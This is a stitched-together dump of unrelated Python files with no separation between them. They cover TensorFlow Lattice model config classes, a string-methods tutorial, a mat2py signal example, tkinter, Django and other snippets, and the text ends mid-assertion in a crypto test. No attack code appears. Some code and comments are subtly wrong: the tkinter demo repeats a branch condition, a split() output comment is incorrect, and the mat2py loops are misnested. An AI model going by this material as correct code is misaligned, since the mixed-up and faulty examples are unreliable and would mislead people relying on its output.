interpolation: One of 'hypercube' or 'simplex' interpolation. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. parameterization: The parameterization of the lattice function class to use. A lattice function is uniquely determined by specifying its value on every lattice vertex. A parameterization scheme is a mapping from a vector of parameters to a multidimensional array of lattice vertex values. It can be one of: - String `'all_vertices'`: This is the "traditional" parameterization that keeps one scalar parameter per lattice vertex where the mapping is essentially the identity map. With this scheme, the number of parameters scales exponentially with the number of inputs to the lattice. The underlying lattice used will be a `tfl.layers.Lattice` layer. - String `'kronecker_factored'`: With this parameterization, for each lattice input i we keep a collection of `num_terms` vectors each having `feature_configs[0].lattice_size` entries (note that all features must have the same lattice size). To obtain the tensor of lattice vertex values, for `t=1,2,...,num_terms` we compute the outer product of the `t'th` vector in each collection, multiply by a per-term scale, and sum the resulting tensors. Finally, we add a single shared bias parameter to each entry in the sum. With this scheme, the number of parameters grows linearly with `len(feature_configs)` (assuming lattice sizes and `num_terms` are held constant). Currently, only monotonicity shape constraint and bound constraint are supported for this scheme. Regularization is not currently supported. The underlying lattice used will be a `tfl.layers.KroneckerFactoredLattice` layer. num_terms: The number of terms in a lattice using `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. random_seed: Random seed to use for initialization of a lattice with `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. 
""" super(CalibratedLatticeConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLatticeConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class CalibratedLinearConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated linear model applies piecewise-linear and categorical calibration on the input feature, followed by a linear combination and an optional output piecewise-linear calibration. When using output calibration or when output bounds are specified, the linear layer will be apply weighted averaging on calibrated inputs. Example: ```python model_config = tfl.configs.CalibratedLinearConfig( feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs=None, regularizer_configs=None, use_bias=True, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles'): """Initializes a `CalibratedLinearConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. use_bias: If a bias term should be used for the linear combination. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. """ super(CalibratedLinearConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLinearConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) # TODO: add option for different pre-aggregation model (linear/ensemble) class AggregateFunctionConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for aggregate function learning model. An aggregate function learning model applies piecewise-linear and categorical calibration on the ragged input features, followed by an aggregation layer that aggregates the calibrated inputs. Lastly a lattice model and an optional output piecewise-linear calibration are applied. 
Example: ```python model_config = tfl.configs.AggregateFunctionConfig( feature_configs=[...], ) model = tfl.premade.AggregateFunction(model_config) model.compile(...) model.fit(...) model.evaluate(...) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs, regularizer_configs=None, middle_dimension=1, middle_lattice_size=2, middle_calibration=False, middle_calibration_num_keypoints=10, middle_monotonicity=None, middle_lattice_interpolation='hypercube', aggregation_lattice_interpolation='hypercube', output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='uniform'): """Initializes an `AggregateFunctionConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. middle_dimension: The number of calibrated lattices that are applied to each block. The outputs of these lattices are then averaged over the blocks, and the middle_dimension resulting numbers are then passed into the "middle" calibrated lattice. This middle lattice therefore has input dimension equal to middle_dimension. middle_lattice_size: Size of each of the middle_lattice dimensions. middle_calibration: If a piecewise-linear calibration should be used on the inputs to the middle lattice. middle_calibration_num_keypoints: Number of keypoints to use for the middle piecewise-linear calibration. middle_monotonicity: Specifies if the middle calibrators should be monotonic, using 'increasing' or 1 to indicate increasing monotonicity, 'decreasing' or -1 to indicate decreasing monotonicity, and 'none' or 0 to indicate no monotonicity constraints. middle_lattice_interpolation: One of 'hypercube' or 'simplex'. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. aggregation_lattice_interpolation: One of 'hypercube' or 'simplex'. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. 
""" super(AggregateFunctionConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return AggregateFunctionConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class FeatureConfig(_Config, _HasRegularizerConfigs): """Per-feature configuration for TFL canned estimators. A feature can either be numerical or categorical. Numeric features will be calibrated using a piecewise-linear function with the given number of keypoints. Categorical features should have `num_buckets > 0` and the `vocabulary_list` represent their categories. Several of the config fields can be filled in automatically based on the `FeatureColumns` used by the model but can also be provided explicitly. See `__init__` args comments for details. Currently only one dimensional feature are supported. Examples: ```python feature_columns = [ tf.feature_column.numeric_column.numeric_column( 'age', default_value=-1), tf.feature_column.numeric_column.categorical_column_with_vocabulary_list( 'thal', vocabulary_list=['normal', 'fixed', 'reversible']), ... ] model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='age', lattice_size=3, # Monotonically increasing. monotonicity='increasing', # Per feature regularization. regularizer_configs=[ tfl.configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ], ), tfl.configs.FeatureConfig( name='thal', # Partial monotonicity: # output(normal) <= output(fixed) # output(normal) <= output(reversible) monotonicity=[('normal', 'fixed'), ('normal', 'reversible')], ), ], # Global regularizers regularizer_configs=[...]) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, name, is_missing_name=None, default_value=None, lattice_size=2, monotonicity='none', unimodality='none', reflects_trust_in=None, dominates=None, pwl_calibration_always_monotonic=False, pwl_calibration_convexity=0, pwl_calibration_num_keypoints=10, pwl_calibration_input_keypoints='quantiles', pwl_calibration_clip_min=None, pwl_calibration_clip_max=None, pwl_calibration_clamp_min=False, pwl_calibration_clamp_max=False, num_buckets=0, vocabulary_list=None, regularizer_configs=None): """Initializes a `FeatureConfig` instance. Args: name: The name of the feature, which should match the name of a given FeatureColumn or a key in the input feature dict. is_missing_name: The name of a FeatureColumn or key in the input feature dict that indicates missing-ness of the main feature. default_value: [Automatically filled in from `FeatureColumns`] If set, this value in the input value represents missing. For numeric features, the output will be imputed. If default_value is provided for a categocial features, it would corresponds to the last bucket counted in num_buckets. lattice_size: The number of lattice verticies to be used along the axis for this feature. monotonicity: - For numeric features, specifies if the model output should be monotonic in this feature, using 'increasing' or 1 to indicate increasing monotonicity, 'decreasing' or -1 to indicate decreasing monotonicity, and 'none' or 0 to indicate no monotonicity constraints. 
- For categorical features, a list of (category_a, category_b) pairs from the vocabulary list indicating that with other features fixed, model output for category_b should be greater than or equal to category_a. If no vocabulary list is specified, we assume implcit vocabulary in the range `[0, num_buckets - 1]`. unimodality: For numeric features specifies if the model output should be unimodal in corresponding feature, using 'valley' or 1 to indicate that function first decreases then increases, using 'peak' or -1 to indicate that funciton first increases then decreases, using 'none' or 0 to indicate no unimodality constraints. Not used for categorical features. reflects_trust_in: None or a list of `tfl.configs.TrustConfig` instances. dominates: None or a list of `tfl.configs.DominanceConfig` instances. pwl_calibration_always_monotonic: Specifies if the piecewise-linear calibration should always be monotonic regardless of the specified end-to-end model output `monotonicity` with respect to this feature. pwl_calibration_convexity: Spefices the convexity constraints of the calibrators for numeric features. Convexity is indicated by 'convex' or 1, concavity is indicated by 'concave' or -1, 'none' or 0 indicates no convexity/concavity constraints. Does not affect categorical features. Concavity together with increasing monotonicity as well as convexity together with decreasing monotonicity results in diminishing return constraints. pwl_calibration_num_keypoints: Number of keypoints to use for piecewise-linear calibration. pwl_calibration_input_keypoints: Indicates what should be used for the input keypoints of the piecewise-linear calibration. It can be one of: - String `'quantiles'`: Input keypoints are set to feature quantiles. - String `'uniform'`: Input keypoints are uniformly spaced in feature range. - A list of numbers: Explicitly specifies the keypoints. pwl_calibration_clip_min: Input values are lower clipped by this value. pwl_calibration_clip_max: Input values are upper clipped by this value. pwl_calibration_clamp_min: for monotonic calibrators ensures that the minimum value in calibration output is reached. pwl_calibration_clamp_max: for monotonic calibrators ensures that the maximum value in calibration output is reached. num_buckets: [Automatically filled in from `FeatureColumns`] Number of categories for a categorical feature. Out-of-vocabulary and missing/default value should be counted into num_buckets (last buckets). vocabulary_list: [Automatically filled in from `FeatureColumns`] The input vocabulary of the feature. regularizer_configs: None or a list of per-feature `tfl.configs.RegularizerConfig` instances. """ super(FeatureConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return FeatureConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class RegularizerConfig(_Config): """Regularizer configuration for TFL canned estimators. Regularizers can either be applied to specific features, or can be applied globally to all features or lattices. * **Calibrator regularizers:** These regularizers are applied to PWL calibration layers. - `'calib_laplacian'`: Creates an instance of `tfl.pwl_calibration_layer.LaplacianRegularizer`. A calibrator laplacian regularizer penalizes the changes in the output and results in a *flatter calibration function*. - `'calib_hessian'`: Creates an instance of `tfl.pwl_calibration_layer.HessianRegularizer`. 
A calibrator hessian regularizer penalizes changes in the slope, resulting in a *more linear calibration*. - `'calib_wrinkle'`: Creates an instance of `tfl.pwl_calibration_layer.WrinkleRegularizer`. A calibrator wrinkle regularizer penalizes the second derivative, resulting in a smoother function with *less changes in the curvature*. * **Lattice regularizers:** These regularizers are applied to lattice layers. - `'laplacian'`: Creates an instance of `tfl.lattice_layer.LaplacianRegularizer`. Laplacian regularizers penalize the difference between adjacent vertices in multi-cell lattice, resulting in a *flatter lattice function*. - `'torsion'`: Creates an instance of `tfl.lattice_layer.TorsionRegularizer`. Torsion regularizers penalizes how much the lattice function twists from side-to-side, a non-linear interactions in each 2 x 2 cell. Using this regularization results in a *more linear lattice function*. Examples: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='age', lattice_size=3, # Per feature regularization. regularizer_configs=[ tfl.configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ], ), tfl.configs.FeatureConfig( name='thal', # Partial monotonicity: # output(normal) <= output(fixed) # output(normal) <= output(reversible) monotonicity=[('normal', 'fixed'), ('normal', 'reversible')], ), ], # Global regularizers regularizer_configs=[ # Torsion regularizer applied to the lattice to make it more linear. configs.RegularizerConfig(name='torsion', l2=1e-4), # Globally defined calibration regularizer is applied to all features. configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ]) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, name, l1=0.0, l2=0.0): """Initializes a `RegularizerConfig` instance. Args: name: The name of the regularizer. l1: l1 regularization amount. l2: l2 regularization amount. """ super(RegularizerConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return RegularizerConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class TrustConfig(_Config): """Configuration for feature trusts in TFL canned estimators. You can specify how a feature reflects trust in another feature. Supported trust types (see `tfl.layers.Lattice` for details): - `'edgeworth'`: Edgeworth trust constrains the function to be more responsive to a main feature as a secondary conditional feature increases or decreases. For example, we may want the model to rely more on average rating (main feature) when the number of reviews (conditional feature) is high. In particular, the constraint guarantees that a given change in the main feature's value will change the model output by more when a secondary feature indicates higher trust in the main feature. Note that the constraint only works when the model is monotonic in the main feature. 
- `'trapezoid'`: Trapezoid trust is conceptually similar to edgeworth trust, but this constraint guarantees that the range of possible outputs along the main feature dimension, when a conditional feature indicates low trust, is a *subset* of the range of outputs when a conditional feature indicates high trust. When lattices have 2 vertices in each constrained dimension, this implies edgeworth trust (which only constrains the size of the relevant ranges). With more than 2 lattice vertices per dimension, the two constraints diverge and are not necessarily 'weaker' or 'stronger' than each other - edgeworth trust acts throughout the lattice interior on delta shifts in the main feature, while trapezoid trust only acts on the min and max extremes of the main feature, constraining the overall range of outputs across the domain of the main feature. The two types of trust constraints can be applied jointly. Trust constraints only affect lattices. When using trapezoid constraints in ensemble models, note that if a conditional feature is used in a lattice without the main feature also being used in the same lattice, then the trapezoid constraint might be violated for the ensemble function. Exampes: One feature reflecting trust in another: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='num_reviews', reflects_trust_in=[ configs.TrustConfig( feature_name='average_rating', trust_type='edgeworth'), ], ), tfl.configs.FeatureConfig( name='average_rating', ), ]) ``` Features can reflect positive or negative trust in other features. For example if the task is to estimate a property price in a neighborhood given two average prices for commercial and residential properties, you can use a trust feature `percentage_commercial_properties` to indicate that the model should more responsive to commercial estimate if more properties are commercial in the neighborhood. You can simultaneously have a negative trust constratins for residential properties, since higher commercial land usage indicates fewer houses, hence less market influence and less accurate estimate for residential property prices. ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='percentage_commercial_properties', reflects_trust_in=[ configs.TrustConfig( feature_name='average_commercial_property_price', direction='positive'), configs.TrustConfig( feature_name='average_residential_property_price', direction='negative'), ], ), tfl.configs.FeatureConfig( name='average_commercial_property_price', ), tfl.configs.FeatureConfig( name='average_residential_property_price', ), tfl.configs.FeatureConfig( name='square_footage', ), ... ]) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_name, trust_type='edgeworth', direction='positive'): """Initializes a `TrustConfig` instance. Args: feature_name: Name of the "main" feature for the trust constraint. trust_type: Type of trust constraint. Either `'edgeworth'` or `'trapezoid'`. direction: Direction of the trust. Should be: `'positive'`, `'negative'`, 1 or -1. """ super(TrustConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return TrustConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class DominanceConfig(_Config): """Configuration for dominance constraints in TFL canned estimators. You can specify how a feature dominantes another feature. 
Supported dominance types (see `tfl.layers.Lattice` and `tfl.layers.Linear` for details): - `'monotonic'`: Monotonic dominance constrains the function to require the effect (slope) in the direction of the *dominant* dimension to be greater than that of the *weak* dimension for any point in both lattice and linear models. Both dominant and weak dimensions must be monotonic. The constraint is guranteed to satisfy at the end of training for linear models, but might not be strictly satisified for lattice models. In such cases, increase the number of projection iterations. Example: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='num_purchases', dominates=[ configs.DominanceConfig( feature_name='num_clicks', dominance_type='monotonic'), ], ), tfl.configs.FeatureConfig( name='num_clicks', ), ]) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_name, dominance_type='monotonic'): """Initializes a `DominanceConfig` instance. Args: feature_name: Name of the `"dominant"` feature for the dominance constraint. dominance_type: Type of dominance constraint. Currently, supports `'monotonic'`. """ super(DominanceConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return DominanceConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class _TypeDict(collections.defaultdict): """Type dict that defaults to string type for hparams.""" def __init__(self, hparams): super(_TypeDict, self).__init__(lambda: str, {k: type(v) for k, v in hparams.values().items()}) def __contains__(self, _): return True def apply_updates(model_config, updates): """Updates a model config with the given set of (key, values) updates. Any value passed in the updates that matches a field of the config will be applied to the config. Nested configs can be updated as follows: to add/update a field `FIELD` in feature config for feature `FEATURE`, use `feature__FEATURE__FIELD` as the key. To add/update a field `FIELD` for regularizer with name `REGULARIZER` use `regularizer__REGULARIZER__FIELD` as the key. This naming scheme can be nested. When possible, string values will be converted to the corresponding value type in the model config. Example: ```python model_config = ... updates = [ ('output_max', 1), ('regularizer__torsion__l1', 0.001), ('feature__some_feature_name__lattice_size', 4), ('feature__some_feature_name__regularizer__calib_hessian__l2', 0.001), ('unrelated_haparam_not_affecting_model_config', 42), ] configs.apply_updates(model_config, updates) ``` Arguments: model_config: The model config object to apply the updates to. updates: A list of (key, value) pairs with potential config updates. Values that are not matched to a field in the model config will be ignored. Returns: Number of updates that are applied to the model config. """ applied_updates = 0 for k, v in updates: if _apply_update(model_config, k, v): applied_updates += 1 logging.info('Updated model config with %s=%s', k, str(v)) return applied_updates def _apply_update(node, k, v): """Applies k, v updates to the given config node. 
See apply_updates.""" while '__' in k: parts = k.split('__', 2) if len(parts) != 3: return False prefix, child_node_name, k = parts if (prefix == _HPARAM_FEATURE_PREFIX and isinstance(node, _HasFeatureConfigs)): node = node.feature_config_by_name(child_node_name) elif (prefix == _HPARAM_REGULARIZER_PREFIX and isinstance(node, _HasRegularizerConfigs)): node = node.regularizer_config_by_name(child_node_name) else: return False if hasattr(node, k): if isinstance(v, str): current_value = getattr(node, k) if current_value is None: raise ValueError( 'Field `{}` has None value and can not be overridden by the ' 'hparams string value `{}` since the type cannot be inferred. An ' 'initial value must be set for the field to use string hparams.' .format(k, v)) v = type(current_value)(v) setattr(node, k, v) return True return False 010-strings/3_string_methods.py strSample = "This is a sample String" print(strSample) # convert to upper case print(strSample.upper()) # convert to lower case print(strSample.lower()) # make it as title print(strSample.title()) # Removing whitespaces strSample2 = " This is a sample String with white spaces at the beginning and and the end! " print(strSample2) # prints " This is a sample String with white spaces at the beginning and and the end! " print(strSample2.strip()) # prints "This is a sample String with white spaces at the beginning and and the end!" print(strSample2.lstrip()) # prints "This is a sample String with white spaces at the beginning and and the end! " print(strSample2.rstrip()) # prints " This is a sample String with white spaces at the beginning and and the end!" # Replace string print(strSample2.replace("beginning", "start")) # Split string print(strSample2.split(" ")) # prints ['', 'This', 'is', 'a', 'sample', 'String', 'with', 'white', 'spaces', 'at', 'the', 'beginning', 'and', 'and', 'the', 'end!', ''] # Casecading methods print(strSample2.strip().split(" ")) # prints ['', 'This', 'is', 'a', 'sample', 'String', 'with', 'white', 'spaces', 'at', 'the', 'beginning', 'and', 'and', 'the', 'end!', ''] mat2py/mat2pyexamples/gallery/ReconstructSignal.py # type: ignore import mat2py as mp from mat2py.core import * def square(t, duty): tmp = mod(t, 2 * pi) w0 = ((2 * pi) @ M[duty]) / 100 nodd = tmp < w0 s = (2 * nodd) - 1 return s def example(): clear() clc() T = 40 F = mrdivide(1, T) D = 23 dt = (mrdivide(D, T)) * 100 N = 50 w0 = mrdivide(2 * pi, T) t1 = M[0:0.002:T] x1 = square(((2 * pi) @ M[F]) @ M[t1], dt) t2 = M[0:0.002:D] x2 = zeros(1, length(t2)) dif = T - D null_index = t1 <= D x2[I[null_index(M[1 : length(x2)])]] = x1(t1 <= D) x2[I[1, dif:D]] = x1(1, M[dif:D]) X = zeros(1, (2 * N) + 1) + 0j for k in M[(-N):N]: x3 = copy(x1) x3 = x3 * exp((((-1j) * k) @ M[w0]) @ M[t1]) for i in M[1 : (length(t1) - 1)]: X[I[(k + N) + 1]] = X((k + N) + 1) + ( ((M[t1(i + 1) - t1(i)]) @ (x3(i) + x3(i + 1))) / 2 ) x_rec = zeros(1, length(t1)) + 0j for k in M[(-N):N]: x_rec[I[i]] = x_rec(i) + ( (M[(mrdivide(1, T)) @ M[X(k + 51)]]) @ exp(((1j * k) @ M[w0]) @ M[t1(i)]) ) plot(t2, x2, t1, x_rec, "--") shg() w = M[((-50) * w0) : w0 : (50 * w0)] plot(mrdivide(w, 2 * pi), abs(X), "o") shg() if __name__ == "__main__": example() __doc__ = """ % this example is a slightly modified version % from [here](https://www.physicsforums.com/threads/reconstruct-a-signal-by-determining-the-n-fourier-coefficients.982179/) function example() clear(); clc(); %My code: %Type of signal: square T = 40; %Period of the signal [s] F=1/T; % fr D = 23; % length of signal(duration) dt=(D/T)*100; N = 50; 
%Number of coefficients w0 = 2*pi/T; %signal pulse t1= 0:0.002:T; % original signal sampling x1 = square((2*pi*F)*(t1),dt);%initial square signal t2= 0:0.002:D; %modified signal sampling x2 = zeros(1,length(t2)); %initializing the modified signal with null values. dif=T-D; null_index = t1<=D; % Matlab have a lot of strange beheviour x2(null_index(1:length(x2)))=x1(t1<=D);% modify the null values with values from the original signal. x2(1,dif:D)=x1(1,dif:D); %modify for values of t1>=T-D. X = zeros(1, 2*N+1)+0j; for k = -N:N %k represents the variable after which the sum is achieved x3 = x1; %x3 represents the signal obtained after the Fourier Series formula; x3 = x3 .* exp(-1i*k*w0*t1); end for i = 1:length(t1)-1 X(k+N+1) = X(k+N+1) + (t1(i+1)-t1(i)) * (x3(i)+x3(i+1))/2; %reconstruction using the coefficients end x_rec = zeros(1, length(t1))+0j; for k=-N:N x_rec(i) = x_rec(i) + (1/T) * X(k+51) * exp(1i*k*w0*t1(i)); %reconstruction using the coefficients ( the integral being calculated as a sum) end plot(t2,x2, t1, x_rec, '--') shg() w=-50*w0:w0:50*w0; %w is the vector which allows displaying the spectre of the function plot(w/(2*pi),abs(X), 'o'); shg() end % This function is copied from Matlab signal toolbox function s = square(t,duty) % Compute values of t normalized to (0,2*pi) tmp = mod(t,2*pi); % Compute normalized frequency for breaking up the interval (0,2*pi) w0 = 2*pi*duty/100; % Assign 1 values to normalized t between (0,w0), 0 elsewhere nodd = (tmp < w0); % The actual square wave computation s = 2*nodd-1; end """ i3_lemonbar.py #!/usr/bin/env python3 import os from i3_lemonbar_conf import * cwd = os.path.dirname(os.path.abspath(__file__)) lemon = "lemonbar -b -p -f '%s' -f '%s' -g '%s' -B '%s' -F '%s'" % (font, iconfont, geometry, color_back, color_fore) feed = "python3 -c 'import i3_lemonbar_feeder; i3_lemonbar_feeder.run()'" check_output('cd %s; %s | %s' % (cwd, feed, lemon), shell=True) import tkinter as tk window=tk.Tk() window.title('my windows') window.geometry('400x400') l=tk.Label(window,bg='yellow',width=20,text='empty') l.pack() def print_selection(): if (var1.get()==1 & (var2.get()==0)): l.config(text='I love only Python') elif (var1.get()==0 & (var2.get()==0)): l.config(text='I love only C++') elif (var1.get()==0 & (var2.get()==0)): l.config(text='I do not love either ') else: l.config(text='I love both') var1=tk.IntVar() var2=tk.IntVar() cl=tk.Checkbutton(window,text='Python',variable=var1,onvalue=1,offvalue=0 ,command=print_selection) c2=tk.Checkbutton(window,text='C++',variable=var2,onvalue=1,offvalue=0 ,command=print_selection) cl.pack() c2.pack() window.mainloop()''' Python program to reverse the digits of a given number and add it to the original, If the sum is not a palindrome repeat this procedure. Note: A palindrome is a word, number, or other sequence of characters which reads the same backward as forward, such as madam or racecar ''' def rev_number (n): s = 0 while True: k = str (n) if k == k[::-1]: break else: ''' when you do k[::-1], it starts from the end towards the first taking each element. So it reverses a. This is applicable for lists/tuples as well. 
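For example, "1234"[::-1] == "4321" and [1, 2, 3][::-1] == [3, 2, 1].
Here int(k[::-1]) therefore gives the digits of n in reverse order.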
''' m = int (k[::-1]) n += m return n print(rev_number(1234)) print(rev_number(1473)) print(rev_number(9999)) examples/graph_classification.py import sys sys.path.append('../') from autogl.datasets import build_dataset_from_name, utils from autogl.solver import AutoGraphClassifier from autogl.module import Acc, BaseModel dataset = build_dataset_from_name('mutag') utils.graph_random_splits(dataset, train_ratio=0.4, val_ratio=0.4) autoClassifier = AutoGraphClassifier.from_config('../configs/graph_classification.yaml') # train autoClassifier.fit( dataset, time_limit=3600, train_split=0.8, val_split=0.1, cross_validation=True, cv_split=10, ) autoClassifier.get_leaderboard().show() print('best single model:\n', autoClassifier.get_leaderboard().get_best_model(0)) # test predict_result = autoClassifier.predict_proba() print(Acc.evaluate(predict_result, dataset.data.y[dataset.test_index].cpu().detach().numpy()))0 # Retrieve the version number of ped from the setup.py file. # This solution was suggested on Stack Overflow: # http://stackoverflow.com/questions/2058802/how-can-i-get-the-version-defined-in-setup-py-setuptools-in-my-package import pkg_resources # part of setuptools pedtools_version = pkg_resources.require("pedtools")[0].version from django.shortcuts import render from django.http import HttpRequest from django.http import HttpResponse # Create your views here. def index(request): context = { 'name': 'click' } # return HttpResponse('ok') return render(request, 'firstapp/index.html',context=context) 0 from drf_spectacular.extensions import OpenApiSerializerFieldExtension from drf_spectacular.plumbing import build_array_type, is_list_serializer class RecursiveFieldExtension(OpenApiSerializerFieldExtension): target_class = "rest_framework_recursive.fields.RecursiveField" def map_serializer_field(self, auto_schema, direction): proxied = self.target.proxied if is_list_serializer(proxied): component = auto_schema.resolve_serializer(proxied.child, direction) return build_array_type(component.ref) component = auto_schema.resolve_serializer(proxied, direction) return component.ref mstim/glycresoft1-10 from .glycan_source import ( TextFileGlycanHypothesisSerializer, GlycanTransformer, TextFileGlycanCompositionLoader, GlycanCompositionHypothesisMerger, GlycanTypes, named_reductions, named_derivatizations) from .constrained_combinatorics import ( CombinatorialGlycanHypothesisSerializer, CombinatoricCompositionGenerator) from .glycan_combinator import ( GlycanCombinationSerializer, GlycanCombinationBuilder) from .glyspace import ( NGlycanGlyspaceHypothesisSerializer, OGlycanGlyspaceHypothesisSerializer, TaxonomyFilter) from .synthesis import ( SynthesisGlycanHypothesisSerializer, ExistingGraphGlycanHypothesisSerializer, GlycanCompositionEnzymeGraph, synthesis_register) from .convert_analysis import ( GlycanAnalysisHypothesisSerializer, GlycopeptideAnalysisGlycanCompositionExtractionHypothesisSerializer) PhantomChain/python-crypto from crypto.transactions.deserializer import Deserializer def test_vote_deserializer(): serialized = 'ff011e0365b87502034151a3ec46b5670a682b0a63394f863587d1bc97483b1b6c70eb58e7f0aed19200e1f50500000000000101022cca9529ec97a772156c152a00aad155ee6708243e65c9d211a589cb5d43234d3045022100bb39554e077c0cd23ef8376731f6b0457edea0aa04c92a9ef07c84228aa5542c0220648365448a0b19c49ff0bab5cde0bee7999a9cfd5eaefc4a7f03b6f93a2efb51' # noqa deserializer = Deserializer(serialized) actual = deserializer.deserialize() assert actual.asset['votes'] == 
